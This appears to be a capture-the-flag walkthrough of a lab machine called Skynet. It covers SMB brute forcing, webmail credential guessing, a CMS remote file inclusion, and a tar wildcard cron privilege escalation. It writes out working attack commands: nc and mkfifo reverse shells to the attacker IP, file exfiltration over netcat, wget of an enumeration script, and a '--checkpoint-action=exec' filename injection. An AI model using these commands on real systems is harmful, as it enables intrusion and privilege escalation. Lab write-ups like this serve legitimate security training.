NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play a CTF called skynet at
This room starts to move away from the guided path and has far fewer flags, but it retains more than just a two-task approach to keep the person thinking about the types of vulnerability. I’m thinking it might be cool to ask defensive questions as well (something I might add into my room I’m building).
Well we don’t have time to waste, the machines might rise up and judgement day occur so let’s get pwning!
We start off with a full tcp scan as shown:
|nmap -sS -O -sV -sC -A -T4 -Pn -p- -vvv -oA skynet 10.10.206.187|
We find a range of common services on this IP:
- HTTP (80)
There are things we start to notice straight off the bat! This server is leaking a lot of intel!
- Username disclosed (milesdyson)
- Weak password policy
- Suspectable to brute force (no account lockout)
Well SMB is exposed so we start hitting this with a brute force attack! It’s not impossible to get a hit but whilst this is running, we can go and explore other areas. I’ve used msf but you could easily use hydra or nmap to perform this attack (or write a custom script if that makes you happy!)
smbclient -L 10.10.206.187
Now we also noticed an anon access share:
Let’s explore that!
Using smbget we found a log file with a what looks it contains a list of passwords.
We poke about here for a while the books seem like they are rabbit holes!
When multiple services are exposed it’s important to leave no stone unturned! You never know what service might contain a vulnerability that can be exploited and until you try you won’t know!
We run a whole range of web discovery, including forced browsing using dirbuster (again you could use BURP PRO content discovery or gobuster or other tools!)
I used dirbuster on the HTTP Service on TCP 80 and found a webmail login
Now we know we have a username and we found what looks like a list of passowords! Using BURP I ran an intruder attack to identify the following credentials:
Hacker Voice: “I’m in”
In the email we search around and discovery that we have the following:
A password reset email that sends credentials in an insecure manner! Easy money (haha I coulnd’t write this without some T2 quotes in!)
SMB I’ll be back
A likely target for these creds is the home folder we found earlier, again I use msf but you could use the other tools (smbclient etc.)! We run an SMB Login check
SMB USER: milesdyson
Now we have SMB Creds
We can see the creds are valid!
Now let’s see what secrets we can find in the home foler!
|smbclient -L 10.10.206.187 -U //SKYNET/milesdyson|
|smbclient //10.10.206.187/milesdyson -U “milesdyson”|
|smbget smb://10.10.206.187/milesdyson -U “milesdyson” -R|
In the files there is an important.txt
It leaks a CMS directory path
Using google we find that there is an RFI vulnerability in this app
Browse to this path then base64 decode
Since this is an RFI we can host a webshell and get the server to connect to us and spawn a shell.
For this we will need:
- An http listener (python)
- A php reverse shell
- A netcat listener
Copy a php reverse shell and edit the params (IP and PORT)
So, here’s our listener
And finally our python http server
Now we need to build our RFI payload:
Now we have the user flag!
Let’s upgrade our shell using python
|python -c ‘import pty; pty.spawn(“/bin/bash”)’|
On our attacker machine let’s get some enumeration tools:
|On the target:|
|cd /tmpwget http://10.8.20.85:80/LinEnum.sh|
Now make this executable
|chmod +x LinEnum.sh|
A scheduled task too far
There is a root cron job which affects the userland file system (/home/milesdyson/backups)
Let’s send the enum output to the attacker:
|Setup a nc listener and output the contents to a file|
|nc -l -p 999 -q 1 > linenum.txt < /dev/null|
|Send the file to the server|
|cat enum.txt-28-01-20 | nc 10.8.20.85 999| nc 10.8.20.85 999|
Setup a listener
|nc -nlvp 1337|
Spawn a bash shell back to the attacker:
|nc -e /bin/sh 10.8.20.85 1337|
Now the backup script has the following:
tar cf /home/milesdyson/backups/backup.tgz *
This script is vulnerable to attack!
|Victim in the tmp folder|
|cd /var/www/htmlecho “rm /tmp/r;mkfifo /tmp/r;cat /tmp/r|/bin/sh -i 2>&1|nc 10.8.20.85 1337 >/tmp/r” > shell.sh
touch “/var/www/html/–checkpoint-action=exec=sh shell.sh”
chmod +x shell.sh
chmod 777 html
And we have the root flag! After you finish your r00t dance remember to explore the target, steal anything of use and dump creds etc.
This box was a nice path and show’s off a range of vulnerabilities:
- Sensitive Information Disclosure
- Weak Credential Storage
- Passwords in anonymous share
- Weak Authentication
- Lack of account lockout policy and weak password requirements
- Vulnerable Software
- Vulnerable Unpatched CMS
- Insecure Configuration
- CRON jobs running as root using userland writeable assets
I like the mixture of guided and unguided rooms, it provides opportunities to showcase techniques and helps people learn whilst providing a safe space for people to explore.